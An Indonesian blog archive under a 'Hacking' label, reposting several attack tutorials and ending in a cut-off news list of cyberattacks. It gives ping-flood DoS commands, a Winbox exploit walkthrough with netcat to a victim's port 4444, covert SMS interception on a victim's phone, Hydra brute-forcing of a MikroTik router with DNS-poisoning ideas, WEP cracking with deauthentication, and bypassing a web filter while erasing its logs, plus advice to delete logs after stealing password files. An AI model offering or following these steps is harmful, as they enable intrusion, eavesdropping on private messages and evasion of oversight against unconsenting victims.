Tampilkan postingan dengan label Hacking. Tampilkan semua postingan
Tampilkan postingan dengan label Hacking. Tampilkan semua postingan

9 Feb 2014

HACKING MENGUNAKAN DOS (denial of service)

http://www.extremetech.com/wp-content/uploads/2011/07/2000px-StartingMsdos2.jpg
Microsoft DOS datang dengan beberapa hacking tool tersembunyi yang akan saya diskusikan disini. Tool ini dapat ditemukan pada direktori c:\windows jika anda menggunakan win98 dan jika anda menggunakan winxp maka tool ini berada pada C:\winxp\system32. WinXP, Win2000 dan WinNT dirilis dengan beberapa tool internet tambahan. Jadi jika anda masih menggunakan win98 maka saya menyarankan agar menggantinya dengan WinXP. Yang tentunya memiliki fitur securiti tambahan dan perintah hacking internet yang bagus. Dalam manual ini saya akan membahas mengenai beberapa perintah yang ditemukan pada Win98 dan winXP
Jadi bagi pengguna window, berikut ini perintah-perintah hacking pada DOS.
1. ping
2. tracert
3. telnet
4. ftp
5. netstat
OK, inilah keterangannya.
1. ping
Utiliy ini digunakan untuk mencari keberadaan remote host. Yan gmengirmkan sebuah signal SYN ke remote host dan jika remote host membalas maka berarti memang ada suatu remote machine.
Cobalah anda ketik perintah ini:
C:\windows>ping/?
*************
Newbie tip: mengetik ‘/?’ setelah perintah dos menampilkan helpnya. Jadi bagaimana anda belajar aneka perintah dos. Bukankah WinXP, WinNT dan Win2000 juga memiliki perintah ‘help’ untuk menampilkan seluruh perintah dos.
*************
Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]
[-r count] [-s count] [[-j host-list] | [-k host-list]]
[-w timeout] destination-list
Options:
-t Ping the specified host until stopped.
To see statistics and continue – type Control-Break;
To stop – type Control-C.
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don’t Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.
Jadi saya dapat melakukan ping ke ip address apapun atau domain name untuk memeriksa keberadaannya di internet. Sebagai contoh saya mengetik “ping localhost” maka saya mendapatkan.
Pinging chintan [127.0.0.1] with 32 bytes of data:
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Reply from 127.0.0.1: bytes=32 time<10ms TTL=128
Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms
************
Newbie tip: ‘localhost’ adalah ip 127.0.0.1 dan merupakan ip address kita sendiri. Juga dikenal sebagai loopback ip. Tapi saat anda terhubung ke internet anda akan diberi ip baru oleh isp anda sebagai identifikasi diri anda. Anda dapat mencari tahu ip anda dengan mengetik”winipcfg” pada menu Start-Run bagi pengguna Win98, sedangkan yang lainnya hanya mengetikkan “ipconfig” pada command prompt.
***********
Hal ini menunjukkan kepada saya bahwa 32 byte data dikirim ke 127.0.0.1 dan dibalas kembali kurang dari 10ms. TTL adalah Time To Live dan nilai range dari 0 hingga 255 (default 128). Sekarang biar kita lihat apa yang terjadi jika saya mengetik “ping http://www.yahoo.com”
Pinging http://www.yahoo.akadns.net [66.218.71.87] with 32 bytes of data:
Reply from 66.218.71.87: bytes=32 time=3448ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2276ms TTL=54
Reply from 66.218.71.87: bytes=32 time=1799ms TTL=54
Reply from 66.218.71.87: bytes=32 time=2850ms TTL=54
Ping statistics for 66.218.71.87:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 1799ms, Maximum = 3448ms, Average = 2593ms
Tapi bagaimana ping tersebut digunakan oleh para hacker? Baiklah, ada dua opsi ‘|’ dan ‘-t’ yang mematikan. -| digunakan untuk spesifikasi ukuran buffer yang dikirimkan (defaultnya 32 byte) bagaimana jika saya mengetik “ping -| 65600 target.com” maka hal ini akan membawa maut 65600 paket data ke target.com yang lebih tinggi dari kapasitas TCP/IP 65535. Tindakan ini menyebabkan target.com menjadi hang dan harus di restart.
Dan jika saya mengetik “ping –t target.com” hal ini akan meneruskan pengiriman 32 byte data ke target.com hingga menghabiskan resource dan menyebabkan hang. Dua jenis serangan diatas dikenal sebagai ping attack bagi penyerang Dos.
***********
Newbie tip: ‘Dos’ yang terakhir disebutkan adalah Denial of service yang dilancarkan oleh hacker untuk menghentikan service pada remote machine.
***********
Catatan: Jenis serangan ini dimasa lalu sering digunakan, namun saat ini pada sistem yang telah diperbarui hal tersebut tidak akan bekerja lagi.
2. Tracert
Perintah Tracert melakukan penjejakan ke remote machine. Sebelum request kita menjangkau remote machine melalui router yang berbeda diantaranya. Tool tracert (dikenal sebagai ‘traceroute’ pada unix) pada awalnya dirancang untuk mencari router mana yang mengalami masalah. Perintah tersebut menunjukkan ip address router yang dilalui request kita sebelum menjangkau remote maching. Sebagai contoh, jika saya mengetik “tracert http://www.yahoo.com” pada dos prompt maka akan terdapat:
Tracing route to http://www.yahoo.akadns.net [66.218.71.87]
over a maximum of 30 hops:
1 * 2296 ms 2025 ms dialpool-210-214-55-11.maa.sify.net [210.214.55.11]
2 2446 ms 2025 ms 2301 ms dialpool-210-214-55-2.maa.sify.net [210.214.55.2]
3 1899 ms 2066 ms 2450 ms lan-202-144-32-177.maa.sify.net [202.144.32.177]
4 * 2885 ms 2749 ms lan-202-144-83-4.maa.sify.net [202.144.83.4]
5 * * * Request timed out.
6 * * * Request timed out.
7 * * * Request timed out.
8 * * * Request timed out.
9 * * * Request timed out.
10 * 3408 ms * http://www.yahoo.akadns.net [66.218.71.87]
11 * * * Request timed out.
12 * * * Request timed out.
13 * * * Request timed out.
14 * * * Request timed out.
15 * * * Request timed out.
16 * * * Request timed out.
17 482 ms 698 ms 624 ms w8.scd.yahoo.com [66.218.71.87]
Baris pertama memberitahukan kita ip mana yang menjejaki dan kemudian jumlah hop. Jumlah hop tergantung pada jumlah server yang ada diantaranya. Setelah memulai tracing. Request pertama saya melalui sify.net (nama ISP server saya) kemudian melalui server yang berbeda dan terakhir menjangkau w8.scd.yahoo.com. Jadi kita dapat melihat berapa lama prosedurnya. Kapanpun anda membuka http://www.yahoo.com dalam web browser, request anda selalu melalui isp dulu (untuk mendapatkan ip dari http://www.yahoo.com dari daftar nama domainnya) kemudian server lain dalam jalur tersebut dan terakhir pada yahoo.
Jadi bagaimana tracert digunakan oleh para hacker. Perintah ini digunakan untuk mencari firewall dan melumpuhkannya. Tracer digunakan bersamaan dengan nmap dapat mengetahui ip sebenarnya dimana firewall terpasang, kemudian hacker tersebut akan melumpuhkannya. Untuk contoh diatas kita melihat bahwa proses tracing terhenti pada w8.scd.yahoo.com. Namun hal ini bukanlah tujuan sebenarnya. Hal itu dikarenakan dihentikan oleh firewall. Mengenai masalah firewall akan kita bahas dalam artikel tersendiri.
3. Telnet
Jika anda menggunakan windows maka ‘telnet’ merupakan hacking tool terhebat bagi anda. Sebenarnya merupakan sebuah terminal yang dapat mengakses remote machine dan menggunakan service-nya. Melalui telnet anda dapat menentukan suatu koneksi antara mesin anda dan remote machine melalui port tertentu.
***********
Newbie tip: Disini saya membicarakan tentang virtual port. Tidak secara fisik yang anda lihat dibalik CPU anda. Hanya sebagai physical port yang digunakan untuk koneksi ke hardware dan dengan cara yang sama virtual port digunakan untuk koneksi pada software. TCP/IP memiliki 65,535 virtual port.
***********
Jika anda mengentik “telnet target.com” maka anda terhubung ke target.com pada prot no. 23 (port yang menjalankan telnet service). Anda juga bisa terhubung ke suatu port lainnya dengan mengetik nomor port setelah target.com. sebagai contoh jika saya ingin terhubung ke port no. 25 (SMTP service) maka salya akan mengetik “telnet target.com 25”.
***********
Newbie tip: Setiap port menjalankan service tertentu. Untuk mendaptkan daftar service yang dijalankan pada port tertentu yang bukalah “C:\windows\services” pada notepad.
***********
Sesaat anda terhubung ke sebuah remote machine pada port tertentu, sebuah window popup telnet dengan daemon yang menjalankan port tersebut menunggu anda mengetikkan perintah. Sebagai contoh “telnet http://www.cyberspace.org” maka seperti gambar dibawah inilah yang saya dapatkan.
Saya harus login disana dan mengetik suatu password dan saya mendapatkan linux shell prompt. Baiklah jika anda mengetikan newuser disana untuk mendapatkan sebuah LoginID dan Password. Dan stelah itu saya menyiapkan perintah untuk mengeksekusi secara remote.
Well, http://www.cyberspace.org memiliki server Linux. Jadi jika anda tidak familiar dengan Linux anda tidak akan mampu menggunakan service-nya.
4. FTP
FTP adalah File Transfer Protocol. Melalui ini anda dapat mendownload atau mengupload file. Dan apa yang hacker inginkan dari ini? Benar!! Tinggal mengeti “ftp target.com” dan daemon banner akan ditampilkan. Tapi disini, dengan tujuan menampilkan file transfer pertama kali anda harus login. Beberapa website mengijinkan adanya naonymous login. Contohnya mengetikkan login “anonymous” dan email-address anda sebagai password. Tentunya anda harus mengetikkan email palsu. Sekarang anda boleh mulai mendownload dan mengupload file. Namun untuk itu anda adanya suatu perintah. Pada FTP prompt anda dapat mengetikkan “?”. Maka akan ditampilkan sbb:
! delete literal prompt send
? debug ls put status
append dir mdelete pwd trace
ascii disconnect mdir quit type
bell get mget quote user
binary globe mkdir recv verbose
bye hash mls remotehelp
cd help mput rename
close lcd open rmdir
Untuk mendaptkan bantuan pada berbagai perintah contohnya perintah delete, mengetikan “? Delete”. Beberapa perintah penting lainnya adalah:
1. ‘pwd’ to know the present directory at remote machine.
contohnya. ftp>pwd
/etc/home
2. ‘lcd’ to change the local directory.
contohnya. ftp>lcd C:\windows
local directory now C:\windows
3. ‘cd’ to change the remote directory.
contohnya. ftp>cd /etc
remote directory now /etc
4. ‘mput’ to send multiple files to remote machine.
contohnya. ftp>mput *.*
sends all files from C:\windows to /etc
5. ‘mget’ to get multiple files from remote machine.
contohnya. ftp>mget *.*
gets all files from /etc to C:\windows
6. ‘open’ to establish a connection with remote host.
contohnya. ftp>open http://www.target.com
7. ‘bye’ closes the connection and quits from ftp
Untuk perintah lainnya dari ftp silakan lihat help mereka.
Sekarang pada yang port FTP (prot 21) adalah membuka http://www.nosecurity.com. Seorang hacker akan terhubung ke situs tersebut menggunakan “ftp http://www.nosecurity.com” pada dos prompt. Kemudian dia akan mencoba login secara anonymous. Dengan anggapan bahwa http://www.nosecurity.com menggunakan linux server, maka hacker tersebut akan mengtikkan perintah “get /etc/apsswd” untuk mendaptkan file password dan mengcracknya. Jika anda adalah seorang hacker, maka jangan lupa untuk menghapus log tersebut.
5. netstat
Anda dapat menentukan suatu koneksi dengan remote machine pada port tertentu, hanya saat port tersebut dibuka pada remote machine. Sebagai contoh, jika anda ingin menentukan sebuah koneksi dengan http://www.target.com pada port 23 (telnet) maka port tersebut seharusnya terbuka pada http://www.target.com. Dan seluruh aktifitas hacking umumnya menggunakan port yang terbuka. Mengetikkan “netstat /?” pada dos prompt memberikan:
Displays protocol statistics and current TCP/IP network connections.
NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]
-a Displays all connections and listening ports.
-e Displays Ethernet statistics. This may be combined with the -s
option.
-n Displays addresses and port numbers in numerical form.
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.
Opsi akan menjelaskan fungsinya masing-masing. Dan yang terpenting adalah opsi –a dan –n. Opsi –a menampilkan seluruh port yang terbuka pada mesin tersebut. Dan jika saya menggunakan opsi –n maka akan menunjukkan ip address sebagai ganti dari domain. Saya mendapatkan hal berikut ini jika saya mengetik “netstat –a” pada command prompt.
Active Connections
Proto Local Address Foreign Address State
TCP chintan:1027 0.0.0.0:0 LISTENING
TCP chintan:80 0.0.0.0:0 LISTENING
TCP chintan:135 0.0.0.0:0 LISTENING
TCP chintan:6435 0.0.0.0:0 LISTENING
TCP chintan:1025 0.0.0.0:0 LISTENING
TCP chintan:1026 0.0.0.0:0 LISTENING
TCP chintan:1028 0.0.0.0:0 LISTENING
TCP chintan:1309 0.0.0.0:0 LISTENING
TCP chintan:1310 0.0.0.0:0 LISTENING
TCP chintan:1285 rumcajs.box.sk:80 ESTABLISHED
TCP chintan:1296 l an-202-144-78-3.maa.sify.net:80 CLOSE_WAIT
TCP chintan:1297 lan-202-144-65-14.sify.net:80 ESTABLISHED
TCP chintan:1310 cdn-v13.websys.aol.com:80 ESTABLISHED
TCP chintan:1220 aiedownload.cps.intel.com:ftp ESTABLISHED
”Proto” menyatakan nama protocol tersebut, “localaddress” memberikan ipaddress kita dan port yang terbuka. “Foreign Address” menyatkaan ipaddress dengan namor port yang terhubung ke kita. “State” menyatakan pernyataan saat ini jika suatu koneksi “established” atau listening atau hanya “waiting”.
Sebagai contoh jika saya membuka http://www.yahoo.com maka saat saya menjalankan “netstat –a” saya akan mendapatkan masukan seperti ini:
“TCP 203.43.50.81:2034 http://www.yahoo.com:80 ESTABLISHED”
Komputer saya dengan ip 203.43.50.81 melalui port 2034 terhubung dengan yahoo pada port 80
*************
Newbie tip: Dengna cara ini anda bisa mendapatkan ip seseorang yang chatting dengan ada. Pertama kali jalankan “netstat –an” dan lihat dibawah foreign ip address. Sekarang mulailah private chating dengan orang lain. Juga jalankan “netstat –an” dan anda akan mendapatkan satu lagin foreign ip pada akhirnya. Inilah ip orang tersebut.
*************
For any questions on t

9 Nov 2013

Winbox Mikrotik Remote Exploit Vulnerability


Remote Exploit vulnerability adalah sebuah celah keamanan yang memungkinkan attacker/hacker untuk mendapatkan akses remote ke dalam system komputer.

Untuk lebih jelasnya mengenai Remote Exploit baca di thred ini
http://indefinitech.com/forum/Thread-apa...ploit.html
Winbox? Winbox adalah aplikasi client mikrotik yang fungsinya untuk mengontrol mikrotik router.

Exploit ini ditemukan oleh "PoURaN" dari 133tsec yang mana exploit ini akan menunggu koneksi pada port 8291(Port default Winbox) dan mengirinkan dll file dan menbuka port 4444 pada komputer client yang menggunakan aplikasi winbox.

Pada saat aplikasi melakukan koneksi pada port 8291 maka komputer kita yang telah disetting sebagai fake mkrotik router akan mengirimkan file dll yang akan menjadikan komputer klien memberikan akses Remote kedalam systemnya.

-Download exploit
- Extract data yang di kompresi dalam zip
- Masuk ke direktori dimana anda meng-extract exploit yang barusan and download
- Saya asumsikan bahwa jika anda menggunakan sistem operasi Windows sudah terinstall Python. Namun jika belum silahkan download python disini http://www.python.org/
- Jika anda menggunakan sistem operasi linux bawaanya sudah terinstall Python


##Jalankan Exploit
-python mtikInject.py

[Image: image.jpg]

-Pada screenshot diatas saya memasukan ppp.dll.bind.gz maka isikan juga ppp.dll.bind.gz pada sesi dialog kemudian enter

Maka akan tampil seperti pada gambar screenshot dibawah ini

[Image: image.jpg]

-Kemudian pergi ke komputer lainnya dan buka aplikasi winbox serta masukan IP komputer yang telah anda siapkan tadi, contohnya :

[Image: image.jpg]

IP 10.10.2.5 adalah IP komputer yang saya jalankan exploit mtikInject.py

- Jika sudah disi IP-nya. Saatnya pada jendela Winbox klik "Connect"

Setelah anda meng-klik "Connect"

[Image: image.jpg]

[Image: image.jpg]

- Download netcat jika belum punya disini
Netcat akan kita pagai untuk mengakses port yang terbuka pada komputer yang menggunakan aplikasi winbox ini dan disinilah hasil "Remote Exploit".

##Syntax Netcat untuk melakukan Remote

nc.exe [ip] [port]

Untuk lebih jelasnya perhatikan screenshot berikut:

[Image: image.jpg]

Kita lihat pada gambar diatas bahwa kita menjalankan Netcat untuk melakukan remote pada IP 192.168.64.130 dan pada port 4444

Hasilnya kita berhasil masuk kedalam sistem komputer korban dan kita pada berada pada direktori "C:\Users\Lab 7\AppData\Roaming\Mikrotik\Winbox\5.14-2196053920>"



Thanks

Possibly Related Threads...
Intrasrv 1.0 Buffer Overflow
MinaliC Webserver 2.0.0 - Buffer Overflow (Egghunter)
ABBS Audio Media Player .LST Buffer Overflow 
source:http://indefinitech.com/forum/Thread-winbox-mikrotik-remote-exploit-vulnerability.html 

3 Okt 2013

Cara Sadap/Hack SMS Menggunakan Operator XL

hack hp, hack sms, hacking, cara hack sms
Setelah sebelum nya Info PC posting artikel tentang Cara Hack Handphone menggunakan aplikasi, maka kali ini Info PC akan menulis tentang Cara Hack SMS atau lebih tepatnya Cara Sadap/Hack SMS Menggunakan Operator dari HP orang lain tanpa sepengetahuan si korban.
Bagaimana cara nya??
Untuk cara kali ini kita memerlukan bantuan dari salah satu operator seluler yang ada di indonesia, yaitu Operator XL dengan tarif Rp. 1.000,-/bulan.
Oke, langsung saja ikuti caranya.
Simak!!
  1. Pertama-tama kamu harus pinjam hp korban (jika tidak di kasih rayu saja pake Magnum).
  2. Kemudian kamu ketik kode berikut dari Hp nya *123*571# kemudian Call.
  3. Setelah keluar menu nya, kamu pilih menu nomor 1 yaitu Auto Copy
  4. Kemudian kamu kirim SMS dari HP korban dengan Format COPY ON kemudian kirim ke nomor Handphone kamu, dan proses penyadapan pun berhasil.
  5. Silakan menikmati setiap SMS dari orang-orang yang kirim pesan kepada korban.
source :
http://infopc-yogi.blogspot.com/2012/10/cara-hack-sms-handphone-orang-lain.html

20 Sep 2013

Hacking Mikrotik Password dengan Inti kelemahan

are
http://blog.xcode.or.id/wp-content/uploads/2011/11/hackmikrotik.jpgTidak ada sistem yang aman 100%, karena begitu banyak kemungkinan jika kita melihat dari berbagai sisi, sebelumnya penulis menulis artikel untuk hacking mikrotik dari sisi celah di telnet, tapi sebenarnya sama bahayanya dengan telnet yaitu FTP.
Percobaan penulis melakukan serangan BF (brute force) pada http, telnet dan ssh mengalami kegagalan, setelah termenung sekian lama ahkirnya penulis ingat serangan BF pada FTP di waktu sebelumnya, ahkirnya penulis mencoba melakukan BF pada FTP dan hasilnya ternyata bisa. Hmm username dan password untuk http, telnet, ssh, telnet adalah sama, satu celah kena maka semua kena, jadi? :)
Dari sisi kompatibilitas mikrotik dapat diancungi jempol tapi akibat dari banyaknya kompatibilitas yang ada dapat membawa ancaman lebih besar, seperti pada telnet yang penulis bahas dan praktek diartikel yang sebelumnya.
Oke, kita langsung praktek saja, kita periksa port yang terbuka di mikrotik
C:\Documents and Settings\serverdata>nmap -A 192.168.1.174
Starting Nmap 5.21 ( http://nmap.org ) at 2011-11-07 15:36 Pacific Standard Time
Nmap scan report for 192.168.1.174
Host is up (0.00013s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE    VERSION
21/tcp   open  ftp        MikroTik router ftpd 3.20
22/tcp   open  ssh        OpenSSH 2.3.0 mikrotik 2.9 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey: 1024 c6:5e:04:d3:12:db:1d:98:c9:17:e2:98:77:d4:39:ba (RSA1)
|_1024 76:68:bc:ee:e3:40:f5:6b:72:ea:44:55:df:86:06:ec (DSA)
23/tcp   open  telnet     Linux telnetd
80/tcp   open  http       MikroTik router http config
|_html-title: mikrotik routeros > administration
2000/tcp open  winbox     MikroTik WinBox management console
8080/tcp open  http-proxy Mikrotik http proxy
8291/tcp open  unknown
MAC Address: 08:00:27:22:84:F1 (Cadmus Computer Systems)
Device type: media device
Running: Chumby embedded
OS details: Chumby Internet radio
Network Distance: 1 hop
Service Info: OS: Linux; Device: router
HOP RTT     ADDRESS
1   0.13 ms 192.168.1.174
OS and Service detection performed. Please report any incorrect results at http:
//nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 170.00 seconds
Ternyata banyak port dan service yang terbuka di mikrotik. :D
Oke tidak perlu berpanjang-panjang lebar lagi, kita langsung hack saja mikrotik target.
C:\Documents and Settings\serverdata>

Anda bisa menggunakan tool Hydra GUI buatan Yogyafree disini
C:\hydra>hydra -l admin -P kamus.txt 192.168.1.174 ftp
Hydra v6.0 (c) 2011 by van Hauser / THC – use allowed only for legal purposes.
Hydra (http://www.thc.org) starting at 2011-11-07 14:39:20
[DATA] 16 tasks, 1 servers, 23 login tries (l:1/p:23), ~1 tries per task
[DATA] attacking service ftp on port 21
[21][ftp] host: 192.168.1.174   login: admin   password: jagoan
[STATUS] attack finished for 192.168.1.174 (waiting for childs to finish)
Hydra (http://www.thc.org) finished at 2011-11-07 14:39:26
Binggo, password mikrotik sudah didapat, kita coba masuk lewat web.

Saat login dan exploitasi yang dapat dilakukan.
Menghajar para pengguna jaringan di mikrotik dengan mengarahkan DNS Servernya ke DNS Server milik kita, ya samalah tekniknya dengan teknik di artikel sebelumnya yang penulis tulis untuk poisoning DNS para pengguna yang menggunakan DHCP router. :D
Ingin dapat bandwidth full ? :D
Terbatas di web, pakai winbox saja dan login pakai pakai password yang kita hack dari FTP sebelumnya biar lebih banyak option lagi, jika ingin mengganti password router password mikrotik di winbox maka contohnya klik saja password dan muncul form input untuk password lama dan password baru.

Oke, sekian dulu, cayooo.
Oleh Kurniawan – yk_family_code@yahoo.com
 sumber:
http://blog.xcode.or.id/?p=661

17 Sep 2013

Hack Wifi dengan Aircrack

http://www.mmbarabba.it/kwuppi/wp-content/uploads/2009/09/schermata-aircrack.png 
Aircrak-ptw adalah tool yang digunakan untuk meng-crack wireless yang diproteksi dengan WEP.Masing-masing notebook dengan spesifikasi berbeda, sehingga cara untuk menggunakan aircrack pun berbeda. Langkah-langkah untuk menggunakan aircrack-ptw untuk beberapa seri notebook adalah sebagai berikut:
ACER 4520, OS Linux Mint Elyssa
Step 1 : Setting wireless card
$ sudo airmon-ng stop ath0
kemudian masukkan
$ iwconfig
Sistem harus merespon sebagai berikut :
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
Step 2 : Start wireless card
$ airmon-ng start wifi0
“9″ adalah channel yang digunakan, chanel ini bisa dilihat melalui kismet
respon sistem harus sebagai berikut:
Interface Chipset Driver
wifi0 Atheros madwifi-ng
ath0 Atheros madwifi-ng VAP (parent: wifi0) (monitor mode enabled)‏
kemudian masukkan
$ iwconfig
dan pastikan bahwa resppon sistem sebagai berikut
lo no wireless extensions.
wifi0 no wireless extensions.
eth0 no wireless extensions.
ath0 IEEE 802.11g ESSID:”” Nickname:””
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
Step 3 : Jalankan airodump-ng
airodump-ng digunakan untuk mengcapture paket dari akses point
$ sudo airodump-ng –channel X –write prefix_for_capture_file interface
misal
$ sudo airodump-ng –channel 3 –write tes ath0
“tes” dimaksudkan bahwa file yang dicapture akan ditulis pada file tes.cap (biasanya tes-01.cap), file .cap tersebut akan di create secara otomatis oleh airodump.
untuk mengetahui channel yang digunakan maka hilangkan channel pada command diatas
$ airodump-ng –write tes ath0
Step 4 : Deauthenticate Clients(optional)
tahap ini dilakukan jika client tidak memberikan ARP request, jadi harus memaksa client untuk men-generate ARP request.
$ sudo aireplay-ng –deauth 15 -a MAC_of_AP -c MAC_client yg_diserang
misal
$ sudo aireplay-ng –deauth 15 -a 00:12:17:A7:AF:E4 -c 00:0F:3D:57:FD:C0 ath0
* -a BSSID/Mac address akses point
* -c MAC Address client
* 15 jumlah paket yang dikirim
Step 5: jalankan aircrak-ptw untuk mengenerate WEP dari akses point.
$ sudo aircrack-ptw tes-01.cap
atau bisa juga menggunakan aircrack-ptw yang sudah dibuild dalam aircrack-ng
$ sudo aircrack-ng -z tes-01.cap -b mac_ssid
misal
$ sudo aircrack-ng -z tes-01.cap -b 00:xx:xx:xx:xx:xx
contoh output :
i $ sudo aircrack-ng -z tohack-01.cap -b 00:xx:xx:xx:xx:xx
Opening tohack-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 261446 ivs.
Aircrack-ng 1.0 beta1
[00:00:00] Tested 81 keys (got 21872 IVs)
KB depth byte(vote)
0 1/ 3 00(28672) 58(27904) 03(26880) 2E(26880) 62(26880) 89(26880) 27(26112) 3F(26112) 0A(25856)
1 3/ 5 8C(27648) CD(27392) 9D(26624) FC(26624) 2B(26112) 87(26112) 14(25856) 77(25856) 7B(25856)
2 0/ 1 EF(31744) FC(29184) 12(28416) 92(27648) CE(27136) 1F(26624) 25(26368) DD(26368) 4C(26112)
3 1/ 6 43(28672) AE(28416) 41(28416) 07(28160) 2F(28160) B2(27392) 5E(26880) CD(26624) 2B(26368)
4 0/ 1 21(30976) 4B(27904) 84(27392) 21(26624) 83(26624) AD(26368) F1(26368) DA(26112) F6(26112)
KEY FOUND! [ 00:xD:EF:xx:xx ] ini adalah key atau password dari wireless network yang didapatkan
ACER 4920, OS:lINUX UBUNTU
Pada acer seri ini wireless card yang digunakan adalah wlan0, dan bukan dengan command ” $ sudo airmon-ng stop ath0″ tetapi
$ sudo airmon-ng start wlan0
untuk langkah selanjutnya sama dengan ACER 4520
BenQ S53W,OS LINUX UBUNTU
pada seri ini wireless card yang digunakan adalah eth 1, dan bukan dengan command “…stop eth1″ tetapi
$ airmon-ng start eth1
Selamat mencoba
Catatan : untuk mengetahui wireless yang digunakan gunakan command ” $ iwconfig ”
Sumber : https://www.facebook.com/notes/kumpulan-teknik-informatika-univ-serambi-mekkah/aircrack-ng/193159214070190?ref=nf

Cara Menembus Proteksi Web

Saat ini banyak perusahaan, sekolahan, kampus maupun instansi lain yang meggunakan software K9 Web Protection untuk memfilter koneksi internetnya, ya tujuannya satu biar produktivitas kerja mereka meningkat, tapi tenang aja Jika anda adalah golongan orang seperti itu dan perusahaan atau tempat anda beraktifitas memfilter website-website yang menjadi sumber inspirasi anda.anda dapat menggunakan software berikut untuk mem-bypass Proteksi K9 Web versi 3 hingga 4.0.288.
Nah Untuk Softwarenya Bisa di download Disini
bypass web filter picture
Nah langkah selanjutnya extrax file tsb dengan winRaR ==>> Install.
dan ikuti langkah- langkah berikut :
  1. Tutup semua browser yang terbuka. (PENTING, agar aplikasi ini bisa memanipulasi LOG)
  2. Jalankan Bypass K9 Web Protection v1.2 lalu klik saja ”Unblock All Website”, akan keluar pesan pemberitahuan bahwa semua web yang di blokir bisa diakses kembali dengan normal. Bypass K9 Web Protection v1.2 bisa Anda tutup sekarang.
  3. Browsing Sepuasnya tanpa dibatasi oleh filter K9. trus klo uda puas browsing.
  4. Tutup semua browser yang terbuka (sama dengan langkah pertama)
  5. Jalankan Bypass K9 Web Protection v1.2 lalu klik ”Restore Admin. Settings”, akan keluar pesan pemberitahuan bahwa kini Administrator setting sudah dikembalikan dalam keadaan seperti sedia kala, termasuk LOG pada K9 WP tentang situs-situs yang Anda buka juga sudah dihapus.
(Untuk dapat menggunakan software ini, pastikan anda masuk sebagai administrator window yang anda gunakan, bukan sebagai guest atau user lain yang hak aksesnya dibawah administrator)

sumber:
http://kapanmaju.blogspot.com/2010/01/di-kantor-online-pakai-proxy-walau.html

21 Agu 2013

7 Serangan Cyber yang Menghebohkan Dunia


Peperangan masa kini tidak hanya berlangsung di dunia nyata. Di dunia maya pun kerap terjadi serangan cyber oleh para hacker, bahkan antar negara.


Cyberwar atau perang cyber antar negara biasanya dilakukan secara sistematis dengan bantuan para hacker handal. Dan sasaran serangan biasanya infrastruktur penting sebuah negara. Namun ada pula hacker individu yang karena kepandaiannya berhasil melancarkan serangan cyber yang hebat. 

Serangan cyber apa saja yang dinilai cukup menghebohkan? Berikut di antaranya 

1. Titan Rain 


China diduga kuat mengembangkan kapabilitas serangan cyber luar biasa yang ditujukan untuk memata-matai negara lain. Terutama Amerika Serikat.

Pada tahun 2003, China dilaporkan melancarkan serangan cyber besar-besaran ke Amerika Serikat yang dijuluki sebagai serangan Titan Rain. Serangan ini berlangsung terus menerus selama tiga tahun dan menyasar institusi penting di Negeri Paman Sam. 

Asal serangan diketahui berasal dari beberapa lokasi di China. Meskipun tidak dapat dipastikan apakah pelakunya individu atau memang sengaja disponsori oleh negara Asia tersebut. 

Sasaran serangan seperti NASA, Lockheed Martin, dan Sandia National Laboratories. Dan selain AS, operasi Titan Rain dilaporkan juga menyasar negara lain, seperti Inggris. 

Menurut laporan media The Guardian ketika itu, serangan asal China menyasar Kementerian Luar Negeri setempat untuk mendapatkan informasi berharga. 

2. Estonia Lumpuh 


Pada 27 April 2007, serangan cyber besar-besaran melanda Estonia. Sasaran serangan adalah institusi penting setempat seperti parlemen, bank, kementerian, sampai media massa.

Kebanyakan serangan berjenis distributed denial of service dengan berbagai macam metode. Selain itu, metode spamming dan deface juga marak dilakukan oleh para pelakunya. 

Beberapa pengamat meyakini serangan ini adalah salah satu yang paling canggih dan sistematis. Banyak yang beranggapan pelakunya didukung negara. Dalam hal ini, tuduhan mengarah ke Rusia. 

Konon serangan dilakukan sebagai protes kebijakan Perdana Menteri Andrus Ansip. Protes terjadi karena Ansip membongkar sebuah monumen tentara Rusia dari ibu kota Estonia, Stallin. 

Menteri luar negeri Estonia, Urmas Paet menuding Rusia terlibat secara langsung dalam serangan tersebut. Namun mereka tidak dapat mengajukan buti kuat dan pihak Rusia pun membantahnya. 

Awal tahun 2012, seorang hacker beretnis Rusia dihukum di Estonia. Dmitri Galushkevic adalah hacker pertama yang dihukum karena melancarkan serangan tersebut. 

3. Stuxnet 


Pada tahun 2010, kegegeran tejadi di Iran. Sebuah virus komputer yang sangat canggih menyasar fasilitas nuklir mereka.

